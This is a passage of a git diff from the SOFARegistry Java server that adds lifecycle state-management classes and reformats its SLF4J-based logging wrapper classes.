Mar 08, 2021 + */ +public interface Suspendable { + + void suspend(); + + void resume(); + + boolean isSuspended(); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/impl/AbstractLifecycle.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/impl/AbstractLifecycle.java new file mode 100644 index 000000000..5ee2921b5 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/impl/AbstractLifecycle.java @@ -0,0 +1,131 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle.impl; + +import com.alipay.sofa.registry.exception.DisposeException; +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.exception.StartException; +import com.alipay.sofa.registry.exception.StopException; +import com.alipay.sofa.registry.lifecycle.*; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public abstract class AbstractLifecycle implements Lifecycle, LifecycleStateAware { + + protected Logger logger = LoggerFactory.getLogger(getClass()); + + private final LifecycleState lifecycleState; + private final LifecycleController lifecycleController; + + public AbstractLifecycle() { + this.lifecycleController = new DefaultLifecycleController(); + this.lifecycleState = new DefaultLifecycleState(this, lifecycleController, logger); + } + + public AbstractLifecycle(LifecycleState lifecycleState, LifecycleController lifecycleController) { + this.lifecycleState = lifecycleState; + this.lifecycleController = lifecycleController; + } + + @Override + public void initialize() throws InitializeException { + LifecycleState.LifecyclePhase phaseName = lifecycleState.getPhase(); + if (!lifecycleController.canInitialize(phaseName)) { + logger.error("[initialize][can not init]{}, {}", phaseName, this); + throw new IllegalStateException("can not initialize:" + phaseName + "," + this); + } + + try { + lifecycleState.setPhase(LifecycleState.LifecyclePhase.INITIALIZING); + doInitialize(); + lifecycleState.setPhase(LifecycleState.LifecyclePhase.INITIALIZED); + } catch (Exception e) { + lifecycleState.rollback(e); + throw new InitializeException(e); + } + } + + protected void doInitialize() throws InitializeException {} + + @Override + public void start() throws StartException { + LifecycleState.LifecyclePhase phaseName = lifecycleState.getPhase(); + if (!lifecycleController.canStart(phaseName)) { + logger.error("[initialize][can not start]{},{}", phaseName, this); + throw new IllegalStateException("can not start:" + phaseName + ", " + this); + } + + try { + lifecycleState.setPhase(LifecycleState.LifecyclePhase.STARTING); + doStart(); + lifecycleState.setPhase(LifecycleState.LifecyclePhase.STARTED); + } catch (Exception e) { + lifecycleState.rollback(e); + throw new StartException(e); + } + } + + protected void doStart() throws StartException {} + + @Override + public void stop() throws StopException { + LifecycleState.LifecyclePhase phaseName = lifecycleState.getPhase(); + if (!lifecycleController.canStop(phaseName)) { + logger.error("[initialize][can not stop]{}, {}", phaseName, this); + throw new IllegalStateException("can not stop:" + phaseName + "," + this); + } + + try { + lifecycleState.setPhase(LifecycleState.LifecyclePhase.STOPPING); + doStop(); + lifecycleState.setPhase(LifecycleState.LifecyclePhase.STOPPED); + } catch (Exception e) { + lifecycleState.rollback(e); + throw new StopException(e); + } + } + + protected void doStop() throws StopException {} + + @Override + public void dispose() throws DisposeException { + LifecycleState.LifecyclePhase phaseName = lifecycleState.getPhase(); + if (!lifecycleController.canDispose(phaseName)) { + logger.error("[initialize][can not stop]{}, {}", phaseName, this); + throw new IllegalStateException("can not dispose:" + phaseName + "," + this); + } + try { + lifecycleState.setPhase(LifecycleState.LifecyclePhase.DISPOSING); + doDispose(); + lifecycleState.setPhase(LifecycleState.LifecyclePhase.DISPOSED); + } catch (Exception e) { + lifecycleState.rollback(e); + throw new DisposeException(e); + } + } + + protected void doDispose() throws DisposeException {} + + @Override + public LifecycleState getLifecycleState() { + return this.lifecycleState; + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/impl/DefaultLifecycleController.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/impl/DefaultLifecycleController.java new file mode 100644 index 000000000..c2a2ea8c6 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/impl/DefaultLifecycleController.java @@ -0,0 +1,54 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle.impl; + +import com.alipay.sofa.registry.lifecycle.*; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public class DefaultLifecycleController implements LifecycleController { + + @Override + public boolean canInitialize(LifecycleState.LifecyclePhase phase) { + + return phase == null || phase.equals(LifecycleState.LifecyclePhase.DISPOSED); + } + + @Override + public boolean canStart(LifecycleState.LifecyclePhase phase) { + + return phase != null + && (phase.equals(LifecycleState.LifecyclePhase.INITIALIZED) + || phase.equals(LifecycleState.LifecyclePhase.STOPPED)); + } + + @Override + public boolean canStop(LifecycleState.LifecyclePhase phase) { + + return phase != null && (phase.equals(LifecycleState.LifecyclePhase.STARTED)); + } + + @Override + public boolean canDispose(LifecycleState.LifecyclePhase phase) { + + return phase != null + && (phase.equals(LifecycleState.LifecyclePhase.INITIALIZED) + || phase.equals(LifecycleState.LifecyclePhase.STOPPED)); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/impl/DefaultLifecycleState.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/impl/DefaultLifecycleState.java new file mode 100644 index 000000000..524746ac4 --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/impl/DefaultLifecycleState.java @@ -0,0 +1,202 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle.impl; + +import com.alipay.sofa.registry.lifecycle.*; +import com.alipay.sofa.registry.log.Logger; +import java.util.concurrent.atomic.AtomicReference; + +/** + * @author chen.zhu + *

Nov 13, 2020 + */ +public class DefaultLifecycleState implements LifecycleState { + + private final Logger logger; + + private final AtomicReference phase = new AtomicReference<>(); + + private final AtomicReference previoisPhase = new AtomicReference<>(); + + private final Lifecycle lifecycle; + + private final LifecycleController lifecycleController; + + public DefaultLifecycleState( + Lifecycle lifecycle, LifecycleController lifecycleController, Logger logger) { + this.lifecycle = lifecycle; + this.lifecycleController = lifecycleController; + this.logger = logger; + } + + @Override + public boolean isEmpty() { + return phase.get() == null; + } + + @Override + public boolean isInitializing() { + + LifecyclePhase currentPhase = getPhase(); + return currentPhase != null && currentPhase.equals(LifecyclePhase.INITIALIZING); + } + + @Override + public boolean isInitialized() { + + LifecyclePhase currentPhase = getPhase(); + return currentPhase != null + && phaseNameIn( + currentPhase, + LifecyclePhase.INITIALIZED, + LifecyclePhase.STARTING, + LifecyclePhase.STARTED, + LifecyclePhase.STOPPING, + LifecyclePhase.STOPPED); + } + + @Override + public boolean isStarting() { + + LifecyclePhase currentPhase = getPhase(); + return currentPhase != null && currentPhase.equals(LifecyclePhase.STARTING); + } + + @Override + public boolean isStarted() { + + LifecyclePhase currentPhase = getPhase(); + return currentPhase == LifecyclePhase.STARTED; + } + + @Override + public boolean isStopping() { + + LifecyclePhase currentPhase = getPhase(); + return currentPhase == LifecyclePhase.STOPPING; + } + + @Override + public boolean isStopped() { + + LifecyclePhase phaseName = getPhase(); + return phaseName == null + || (phaseNameIn( + phaseName, + LifecyclePhase.INITIALIZED, + LifecyclePhase.STOPPED, + LifecyclePhase.DISPOSING, + LifecyclePhase.DISPOSED)); + } + + @Override + public boolean isPositivelyStopped() { + + LifecyclePhase phaseName = getPhase(); + return phaseName != null + && phaseNameIn( + phaseName, LifecyclePhase.STOPPED, LifecyclePhase.DISPOSING, LifecyclePhase.DISPOSED); + } + + private boolean phaseNameIn(LifecyclePhase phase, LifecyclePhase... ins) { + + for (LifecyclePhase in : ins) { + if (phase == in) { + return true; + } + } + return false; + } + + @Override + public boolean isDisposing() { + + LifecyclePhase phaseName = getPhase(); + return phaseName == LifecyclePhase.DISPOSING; + } + + @Override + public boolean isDisposed() { + + LifecyclePhase phaseName = getPhase(); + return phaseName == null || phaseName == LifecyclePhase.DISPOSED; + } + + @Override + public boolean isPositivelyDisposed() { + + LifecyclePhase phaseName = getPhase(); + return phaseName != null && phaseNameIn(getPhase(), LifecyclePhase.DISPOSED); + } + + @Override + public LifecyclePhase getPhase() { + return phase.get(); + } + + @Override + public void setPhase(LifecyclePhase currentPhase) { + if (logger.isInfoEnabled()) { + logger.info( + "[setPhaseName]{}({}) --> {}", + lifecycle, + lifecycle.getClass().getSimpleName(), + currentPhase); + } + previoisPhase.set(phase.get()); + phase.set(currentPhase); + } + + @Override + public String toString() { + return String.format("%s, %s", lifecycle.toString(), phase.get()); + } + + /** only support rollback once */ + @Override + public void rollback(Exception e) { + if (logger.isInfoEnabled()) { + logger.info( + "[rollback]{},{} -> {}, reason:{}", + this, + phase.get(), + previoisPhase.get(), + e.getMessage()); + } + phase.set(previoisPhase.get()); + } + + @Override + public boolean canInitialize() { + return lifecycleController.canInitialize(getPhase()); + } + + @Override + public boolean canStart() { + return lifecycleController.canStart(getPhase()); + } + + @Override + public boolean canStop() { + return lifecycleController.canStop(getPhase()); + } + + @Override + public boolean canDispose() { + return lifecycleController.canDispose(getPhase()); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/impl/LifecycleHelper.java b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/impl/LifecycleHelper.java new file mode 100644 index 000000000..76fdf7a3b --- /dev/null +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/lifecycle/impl/LifecycleHelper.java @@ -0,0 +1,58 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.lifecycle.impl; + +import com.alipay.sofa.registry.exception.DisposeException; +import com.alipay.sofa.registry.exception.InitializeException; +import com.alipay.sofa.registry.exception.StartException; +import com.alipay.sofa.registry.exception.StopException; +import com.alipay.sofa.registry.lifecycle.Lifecycle; + +/** + * @author chen.zhu + *

Nov 20, 2020 + */ +public final class LifecycleHelper { + private LifecycleHelper() {} + + public static void initializeIfPossible(Object obj) throws InitializeException { + + if (obj instanceof Lifecycle && ((Lifecycle) obj).getLifecycleState().canInitialize()) { + ((Lifecycle) obj).initialize(); + } + } + + public static void startIfPossible(Object obj) throws StartException { + + if (obj instanceof Lifecycle && ((Lifecycle) obj).getLifecycleState().canStart()) { + ((Lifecycle) obj).start(); + } + } + + public static void stopIfPossible(Object obj) throws StopException { + + if (obj instanceof Lifecycle && ((Lifecycle) obj).getLifecycleState().canStop()) { + ((Lifecycle) obj).stop(); + } + } + + public static void disposeIfPossible(Object obj) throws DisposeException { + if (obj instanceof Lifecycle && ((Lifecycle) obj).getLifecycleState().canDispose()) { + ((Lifecycle) obj).dispose(); + } + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/log/Logger.java b/server/common/util/src/main/java/com/alipay/sofa/registry/log/Logger.java index ab15880c5..a5fd406c2 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/log/Logger.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/log/Logger.java @@ -17,233 +17,252 @@ package com.alipay.sofa.registry.log; /** - * import slf4j + * import slf4j * * @author shangyu.wh * @version $Id: Logger.java, v 0.1 2017-12-22 15:56 shangyu.wh Exp $ */ public interface Logger { - /** - * TRACE level - * - * @return - * - */ - boolean isTraceEnabled(); - - /** - * Log TRACE level - * - * @param msg - */ - void trace(String msg); - - /** - * Log TRACE level - * @param format - * @param arg - */ - void trace(String format, Object arg); - - /** - * Log TRACE level - * @param format - * @param arg1 - * @param arg2 - */ - void trace(String format, Object arg1, Object arg2); - - /** - * Log TRACE level - * @param format - * @param arguments - */ - void trace(String format, Object... arguments); - - /** - * Log TRACE level - * @param msg - * @param t - */ - void trace(String msg, Throwable t); - - /** - * DEBUG level - * - * @return - */ - boolean isDebugEnabled(); - - /** - * Log DEBUG level. - * - * @param msg - */ - void debug(String msg); - - /** - * Log DEBUG level. - * @param format - * @param arg - */ - void debug(String format, Object arg); - - /** - * Log DEBUG level. - * @param format - * @param arg1 - * @param arg2 - */ - void debug(String format, Object arg1, Object arg2); - - /** - * Log DEBUG level. - * @param format - * @param arguments - */ - void debug(String format, Object... arguments); - - /** - * Log DEBUG level. - * @param msg - * @param t - */ - void debug(String msg, Throwable t); - - /** - * INFO level - * - * @return True if this Logger is enabled for the INFO level, - * false otherwise. - */ - boolean isInfoEnabled(); - - /** - * Log INFO level. - * - * @param msg - */ - void info(String msg); - - /** - * Log INFO level. - * @param format - * @param arg - */ - void info(String format, Object arg); - - /** - * Log INFO level. - * @param format - * @param arg1 - * @param arg2 - */ - void info(String format, Object arg1, Object arg2); - - /** - * Log INFO level. - * @param format - * @param arguments - */ - void info(String format, Object... arguments); - - /** - * Log INFO level. - * @param msg - * @param t - */ - void info(String msg, Throwable t); - - /** - * WARN level - * - * @return - */ - boolean isWarnEnabled(); - - /** - * Log WARN level. - * @param msg - */ - void warn(String msg); - - /** - * Log WARN level. - * @param format - * @param arg - */ - void warn(String format, Object arg); - - /** - * Log WARN level. - * @param format - * @param arguments - */ - void warn(String format, Object... arguments); - - /** - * Log WARN level. - * @param format - * @param arg1 - * @param arg2 - */ - void warn(String format, Object arg1, Object arg2); - - /** - * Log WARN level. - * @param msg - * @param t - */ - void warn(String msg, Throwable t); - - /** - * ERROR level - * - * @return - */ - boolean isErrorEnabled(); - - /** - * Log ERROR level. - * - * @param msg the message string to be logged - */ - void error(String msg); - - /** - * Log ERROR level. - * @param format - * @param arg - */ - void error(String format, Object arg); - - /** - * Log ERROR level. - * @param format - * @param arg1 - * @param arg2 - */ - void error(String format, Object arg1, Object arg2); - - /** - * Log ERROR level. - * @param format - * @param arguments - */ - void error(String format, Object... arguments); - - /** - * Log ERROR level. - * @param msg - * @param t - */ - void error(String msg, Throwable t); - - /** - * get actually logger - * @return - */ - Object getLogger(); - -} \ No newline at end of file + /** + * TRACE level + * + * @return + */ + boolean isTraceEnabled(); + + /** + * Log TRACE level + * + * @param msg + */ + void trace(String msg); + + /** + * Log TRACE level + * + * @param format + * @param arg + */ + void trace(String format, Object arg); + + /** + * Log TRACE level + * + * @param format + * @param arg1 + * @param arg2 + */ + void trace(String format, Object arg1, Object arg2); + + /** + * Log TRACE level + * + * @param format + * @param arguments + */ + void trace(String format, Object... arguments); + + /** + * Log TRACE level + * + * @param msg + * @param t + */ + void trace(String msg, Throwable t); + + /** + * DEBUG level + * + * @return + */ + boolean isDebugEnabled(); + + /** + * Log DEBUG level. + * + * @param msg + */ + void debug(String msg); + + /** + * Log DEBUG level. + * + * @param format + * @param arg + */ + void debug(String format, Object arg); + + /** + * Log DEBUG level. + * + * @param format + * @param arg1 + * @param arg2 + */ + void debug(String format, Object arg1, Object arg2); + + /** + * Log DEBUG level. + * + * @param format + * @param arguments + */ + void debug(String format, Object... arguments); + + /** + * Log DEBUG level. + * + * @param msg + * @param t + */ + void debug(String msg, Throwable t); + + /** + * INFO level + * + * @return True if this Logger is enabled for the INFO level, false otherwise. + */ + boolean isInfoEnabled(); + + /** + * Log INFO level. + * + * @param msg + */ + void info(String msg); + + /** + * Log INFO level. + * + * @param format + * @param arg + */ + void info(String format, Object arg); + + /** + * Log INFO level. + * + * @param format + * @param arg1 + * @param arg2 + */ + void info(String format, Object arg1, Object arg2); + + /** + * Log INFO level. + * + * @param format + * @param arguments + */ + void info(String format, Object... arguments); + + /** + * Log INFO level. + * + * @param msg + * @param t + */ + void info(String msg, Throwable t); + + /** + * WARN level + * + * @return + */ + boolean isWarnEnabled(); + + /** + * Log WARN level. + * + * @param msg + */ + void warn(String msg); + + /** + * Log WARN level. + * + * @param format + * @param arg + */ + void warn(String format, Object arg); + + /** + * Log WARN level. + * + * @param format + * @param arguments + */ + void warn(String format, Object... arguments); + + /** + * Log WARN level. + * + * @param format + * @param arg1 + * @param arg2 + */ + void warn(String format, Object arg1, Object arg2); + + /** + * Log WARN level. + * + * @param msg + * @param t + */ + void warn(String msg, Throwable t); + + /** + * ERROR level + * + * @return + */ + boolean isErrorEnabled(); + + /** + * Log ERROR level. + * + * @param msg the message string to be logged + */ + void error(String msg); + + /** + * Log ERROR level. + * + * @param format + * @param arg + */ + void error(String format, Object arg); + + /** + * Log ERROR level. + * + * @param format + * @param arg1 + * @param arg2 + */ + void error(String format, Object arg1, Object arg2); + + /** + * Log ERROR level. + * + * @param format + * @param arguments + */ + void error(String format, Object... arguments); + + /** + * Log ERROR level. + * + * @param msg + * @param t + */ + void error(String msg, Throwable t); + + /** + * get actually logger + * + * @return + */ + Object getLogger(); +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/log/LoggerFactory.java b/server/common/util/src/main/java/com/alipay/sofa/registry/log/LoggerFactory.java index f136d7f48..dbef78494 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/log/LoggerFactory.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/log/LoggerFactory.java @@ -17,47 +17,50 @@ package com.alipay.sofa.registry.log; /** - * * @author shangyu.wh * @version $Id: LoggerFactory.java, v 0.1 2017-12-22 15:55 shangyu.wh Exp $ */ public class LoggerFactory { - /** - * get logger - * @param name - * @return - */ - public static Logger getLogger(String name) { - return new SLF4JLogger(name); - } + /** + * get logger + * + * @param name + * @return + */ + public static Logger getLogger(String name) { + return new SLF4JLogger(name); + } - /** - * get logger - * @param clazz - * @return - */ - public static Logger getLogger(Class clazz) { - return new SLF4JLogger(clazz); - } + /** + * get logger + * + * @param clazz + * @return + */ + public static Logger getLogger(Class clazz) { + return new SLF4JLogger(clazz); + } - /** - * get logger - * @param name - * @param prefix - * @return - */ - public static Logger getLogger(String name, String prefix) { - return new SLF4JLogger(name, prefix); - } + /** + * get logger + * + * @param name + * @param prefix + * @return + */ + public static Logger getLogger(String name, String prefix) { + return new SLF4JLogger(name, prefix); + } - /** - * get logger - * @param clazz - * @param prefix - * @return - */ - public static Logger getLogger(Class clazz, String prefix) { - return new SLF4JLogger(clazz, prefix); - } -} \ No newline at end of file + /** + * get logger + * + * @param clazz + * @param prefix + * @return + */ + public static Logger getLogger(Class clazz, String prefix) { + return new SLF4JLogger(clazz, prefix); + } +} diff --git a/server/common/util/src/main/java/com/alipay/sofa/registry/log/SLF4JLogger.java b/server/common/util/src/main/java/com/alipay/sofa/registry/log/SLF4JLogger.java index 935855fa4..73930487e 100644 --- a/server/common/util/src/main/java/com/alipay/sofa/registry/log/SLF4JLogger.java +++ b/server/common/util/src/main/java/com/alipay/sofa/registry/log/SLF4JLogger.java @@ -16,306 +16,302 @@ */ package com.alipay.sofa.registry.log; -import org.slf4j.LoggerFactory; - import java.io.File; import java.io.Serializable; +import org.slf4j.LoggerFactory; /** - * * @author shangyu.wh * @version $Id: SLF4JLogger.java, v 0.1 2017-12-22 16:04 shangyu.wh Exp $ */ public class SLF4JLogger implements Logger, Serializable { - private static final long serialVersionUID = 1L; - - private static final String LOG_PATH = "logging.path"; - private static final String LOG_PATH_DEFAULT = System.getProperty("user.home") - + File.separator + "logs"; - private static final String SERVER_LOG_LEVEL = "com.alipay.sofa.registry.server.log.level"; - private static final String SERVER_LOG_LEVEL_DEFAULT = "INFO"; - - private final String name; - - private final org.slf4j.Logger logger; - - private final String msgPrefix; - - /** symbol : */ - public static final char SPACE = ' '; - - static { - - String logPath = System.getProperty(LOG_PATH); - String logLevel = System.getProperty(SERVER_LOG_LEVEL); - if (logPath == null || logPath.isEmpty()) { - System.setProperty(LOG_PATH, LOG_PATH_DEFAULT); - } - if (logLevel == null || logLevel.isEmpty()) { - System.setProperty(SERVER_LOG_LEVEL, SERVER_LOG_LEVEL_DEFAULT); - } - + private static final long serialVersionUID = 1L; + + private static final String LOG_PATH = "logging.path"; + private static final String LOG_PATH_DEFAULT = + System.getProperty("user.home") + File.separator + "logs"; + private static final String SERVER_LOG_LEVEL = "com.alipay.sofa.registry.server.log.level"; + private static final String SERVER_LOG_LEVEL_DEFAULT = "INFO"; + + private final String name; + + private final org.slf4j.Logger logger; + + private final String msgPrefix; + + /** symbol : */ + public static final char SPACE = ' '; + + static { + String logPath = System.getProperty(LOG_PATH); + String logLevel = System.getProperty(SERVER_LOG_LEVEL); + if (logPath == null || logPath.isEmpty()) { + System.setProperty(LOG_PATH, LOG_PATH_DEFAULT); + } + if (logLevel == null || logLevel.isEmpty()) { + System.setProperty(SERVER_LOG_LEVEL, SERVER_LOG_LEVEL_DEFAULT); } - - /** - * @param name - */ - public SLF4JLogger(String name) { - this.name = name; - this.msgPrefix = ""; - this.logger = getLoggerBySpace(name); + } + + /** @param name */ + public SLF4JLogger(String name) { + this.name = name; + this.msgPrefix = ""; + this.logger = getLoggerBySpace(name); + } + + /** @param clazz */ + public SLF4JLogger(Class clazz) { + String loggerName = clazz.getCanonicalName(); + if (loggerName == null) { + loggerName = clazz.getName(); } + this.name = loggerName; + this.msgPrefix = ""; + this.logger = getLoggerBySpace(name); + } - /** - * @param clazz - */ - public SLF4JLogger(Class clazz) { - this.name = clazz.getCanonicalName(); - this.msgPrefix = ""; - this.logger = getLoggerBySpace(name); - } + /** + * @param name + * @param msgPrefix + */ + public SLF4JLogger(String name, String msgPrefix) { + this.name = name; + this.msgPrefix = msgPrefix; + this.logger = getLoggerBySpace(name); + } - /** - * @param name - * @param msgPrefix - */ - public SLF4JLogger(String name, String msgPrefix) { - this.name = name; - this.msgPrefix = msgPrefix; - this.logger = getLoggerBySpace(name); - } + /** + * @param clazz + * @param msgPrefix + */ + public SLF4JLogger(Class clazz, String msgPrefix) { + this.name = clazz.getCanonicalName(); + this.msgPrefix = msgPrefix; + this.logger = getLoggerBySpace(name); + } - /** - * @param clazz - * @param msgPrefix - */ - public SLF4JLogger(Class clazz, String msgPrefix) { - this.name = clazz.getCanonicalName(); - this.msgPrefix = msgPrefix; - this.logger = getLoggerBySpace(name); + /** + * @param name + * @return + */ + public org.slf4j.Logger getLoggerBySpace(String name) { + if (name == null || name.isEmpty()) { + return null; } + return LoggerFactory.getLogger(name); + } - /** - * @param name - * @return - */ - public org.slf4j.Logger getLoggerBySpace(String name) { - if (name == null || name.isEmpty()) { - return null; - } - return LoggerFactory.getLogger(name); + @Override + public void trace(String msg) { + if (logger.isTraceEnabled()) { + logger.trace(processMsg(msg)); } + } - @Override - public void trace(String msg) { - if (logger.isTraceEnabled()) { - logger.trace(processMsg(msg)); - } + @Override + public void trace(String format, Object arg) { + if (logger.isTraceEnabled()) { + logger.trace(processMsg(format), arg); } + } - @Override - public void trace(String format, Object arg) { - if (logger.isTraceEnabled()) { - logger.trace(processMsg(format), arg); - } + @Override + public void trace(String format, Object arg1, Object arg2) { + if (logger.isTraceEnabled()) { + logger.trace(processMsg(format), arg1, arg2); } + } - @Override - public void trace(String format, Object arg1, Object arg2) { - if (logger.isTraceEnabled()) { - logger.trace(processMsg(format), arg1, arg2); - } + @Override + public void trace(String format, Object... arguments) { + if (logger.isTraceEnabled()) { + logger.trace(processMsg(format), arguments); } + } - @Override - public void trace(String format, Object... arguments) { - if (logger.isTraceEnabled()) { - logger.trace(processMsg(format), arguments); - } + @Override + public void trace(String msg, Throwable e) { + if (logger.isTraceEnabled()) { + logger.trace(processMsg(msg), e); } + } - @Override - public void trace(String msg, Throwable e) { - if (logger.isTraceEnabled()) { - logger.trace(processMsg(msg), e); - } + @Override + public void debug(String msg) { + if (logger.isDebugEnabled()) { + logger.debug(processMsg(msg)); } + } - @Override - public void debug(String msg) { - if (logger.isDebugEnabled()) { - logger.debug(processMsg(msg)); - } + @Override + public void debug(String format, Object arg) { + if (logger.isDebugEnabled()) { + logger.debug(processMsg(format), arg); } + } - @Override - public void debug(String format, Object arg) { - if (logger.isDebugEnabled()) { - logger.debug(processMsg(format), arg); - } + @Override + public void debug(String format, Object arg1, Object arg2) { + if (logger.isDebugEnabled()) { + logger.debug(processMsg(format), arg1, arg2); } + } - @Override - public void debug(String format, Object arg1, Object arg2) { - if (logger.isDebugEnabled()) { - logger.debug(processMsg(format), arg1, arg2); - } + @Override + public void debug(String format, Object... arguments) { + if (logger.isDebugEnabled()) { + logger.debug(processMsg(format), arguments); } + } - @Override - public void debug(String format, Object... arguments) { - if (logger.isDebugEnabled()) { - logger.debug(processMsg(format), arguments); - } + @Override + public void debug(String msg, Throwable e) { + if (logger.isDebugEnabled()) { + logger.debug(processMsg(msg), e); } + } - @Override - public void debug(String msg, Throwable e) { - if (logger.isDebugEnabled()) { - logger.debug(processMsg(msg), e); - } + @Override + public void info(String msg) { + if (logger.isInfoEnabled()) { + logger.info(processMsg(msg)); } + } - @Override - public void info(String msg) { - if (logger.isInfoEnabled()) { - logger.info(processMsg(msg)); - } + @Override + public void info(String format, Object arg) { + if (logger.isInfoEnabled()) { + logger.info(processMsg(format), arg); } + } - @Override - public void info(String format, Object arg) { - if (logger.isInfoEnabled()) { - logger.info(processMsg(format), arg); - } + @Override + public void info(String format, Object arg1, Object arg2) { + if (logger.isInfoEnabled()) { + logger.info(processMsg(format), arg1, arg2); } + } - @Override - public void info(String format, Object arg1, Object arg2) { - if (logger.isInfoEnabled()) { - logger.info(processMsg(format), arg1, arg2); - } + @Override + public void info(String format, Object... arguments) { + if (logger.isInfoEnabled()) { + logger.info(processMsg(format), arguments); } + } - @Override - public void info(String format, Object... arguments) { - if (logger.isInfoEnabled()) { - logger.info(processMsg(format), arguments); - } + @Override + public void info(String msg, Throwable e) { + if (logger.isInfoEnabled()) { + logger.info(processMsg(msg), e); } + } - @Override - public void info(String msg, Throwable e) { - if (logger.isInfoEnabled()) { - logger.info(processMsg(msg), e); - } + @Override + public void warn(String msg) { + if (logger.isWarnEnabled()) { + logger.warn(processMsg(msg)); } + } - @Override - public void warn(String msg) { - if (logger.isWarnEnabled()) { - logger.warn(processMsg(msg)); - } + @Override + public void warn(String format, Object arg) { + if (logger.isWarnEnabled()) { + logger.warn(processMsg(format), arg); } + } - @Override - public void warn(String format, Object arg) { - if (logger.isWarnEnabled()) { - logger.warn(processMsg(format), arg); - } + @Override + public void warn(String format, Object... arguments) { + if (logger.isWarnEnabled()) { + logger.warn(processMsg(format), arguments); } + } - @Override - public void warn(String format, Object... arguments) { - if (logger.isWarnEnabled()) { - logger.warn(processMsg(format), arguments); - } + @Override + public void warn(String format, Object arg1, Object arg2) { + if (logger.isWarnEnabled()) { + logger.warn(processMsg(format), arg1, arg2); } + } - @Override - public void warn(String format, Object arg1, Object arg2) { - if (logger.isWarnEnabled()) { - logger.warn(processMsg(format), arg1, arg2); - } + @Override + public void warn(String msg, Throwable e) { + if (logger.isWarnEnabled()) { + logger.warn(processMsg(msg), e); } + } - @Override - public void warn(String msg, Throwable e) { - if (logger.isWarnEnabled()) { - logger.warn(processMsg(msg), e); - } + @Override + public void error(String msg) { + if (logger.isErrorEnabled()) { + logger.error(processMsg(msg)); } + } - @Override - public void error(String msg) { - if (logger.isErrorEnabled()) { - logger.error(processMsg(msg)); - } + @Override + public void error(String format, Object arg) { + if (logger.isErrorEnabled()) { + logger.error(processMsg(format), arg); } + } - @Override - public void error(String format, Object arg) { - if (logger.isErrorEnabled()) { - logger.error(processMsg(format), arg); - } + @Override + public void error(String format, Object arg1, Object arg2) { + if (logger.isErrorEnabled()) { + logger.error(processMsg(format), arg1, arg2); } + } - @Override - public void error(String format, Object arg1, Object arg2) { - if (logger.isErrorEnabled()) { - logger.error(processMsg(format), arg1, arg2); - } + @Override + public void error(String format, Object... arguments) { + if (logger.isErrorEnabled()) { + logger.error(processMsg(format), arguments); } + } - @Override - public void error(String format, Object... arguments) { - if (logger.isErrorEnabled()) { - logger.error(processMsg(format), arguments); - } + @Override + public void error(String msg, Throwable e) { + if (logger.isErrorEnabled()) { + logger.error(processMsg(msg), e); } + } - @Override - public void error(String msg, Throwable e) { - if (logger.isErrorEnabled()) { - logger.error(processMsg(msg), e); - } - } + @Override + public boolean isTraceEnabled() { + return 